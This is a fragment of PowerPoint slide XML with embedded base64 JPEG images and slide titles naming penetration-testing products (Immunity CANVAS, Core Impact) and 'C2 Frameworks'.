xTPRnpvno6SmEsXJpJ4ga56SjpKAEJdnKeIHlTdtjp7Ip/0lGetsWkR3+jJ2UomylHIeVPc9HSUWFITTBgUusYFcZ6OkoNwLhq9z03z0dJWG2OM9GekFJJAAJJ0AAuSewDnV53Z9G8klnxV0TiIxpI34j+oPj4UspKOxoxctEHu/u9LjHsgsgPXkI6q937Tdw+HGtb2HsCPCxhEHeSfWY+0x+nKneCwCRIERQqqLBVFgP87ac1yzm5HZDjUQoooqZUKKKKACiiigAooooAKKKKACiiigDwiovbW7MGLW00YYjgw0dfwuNfdwqVorU6MavZk23PRXNHdsMwlX2Gskg9/qt8PCqVjMLJC2WVGRvZdSp91+NfR1N8XgI5VyyIrr7LqGHkatHma2QlwJ6PnPpKOkrZNo+i3By6qrwn/wBt9P8Ape48rVW8b6GnH6LEqe6SMr/EpPyqy5Ysg+GaM/6SjpKtOI9FWOXgsT/hlt/OFpm/o52gP/LE+EsR/rpu8fsn0n9EF0lHSVOr6OtoH/yxHjLEP66dQei3HtxSNPxTL/Rmo7x+w6S+isdJR0lX3B+huU/pcTGvciM582y1YtneifCR2MnSTH9t8q/9KW+JNK+WKHXDNmRwRs7BUVmY8FVSzHwA1q4bE9GOJmsZrQJ2HrSHwQGw95HhWrYDZMUC5YY0jXsRQt/G3H306AqMuZvReP46WyD2Dufh8ILxpd+cj9aQ+B4KO4WqcAr2iott7OhJLQUUUVhoUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQB5XtFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAf/Z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42" name="Picture 2" descr="http://media.scmagazineus.com/images/2011/10/25/0211-gt1-core4_20476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2400" y="1295400"/>
            <a:ext cx="5409521" cy="404812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http://immunityinc.com/images/CANVAS_app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843744" y="2895600"/>
            <a:ext cx="4984225" cy="366295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341842" y="1219200"/>
            <a:ext cx="8181974" cy="5029200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						Immunity CANVAS</a:t>
            </a:r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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Core Impact</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22394075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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2 Frameworks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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9" descr="data:image/jpeg;base64,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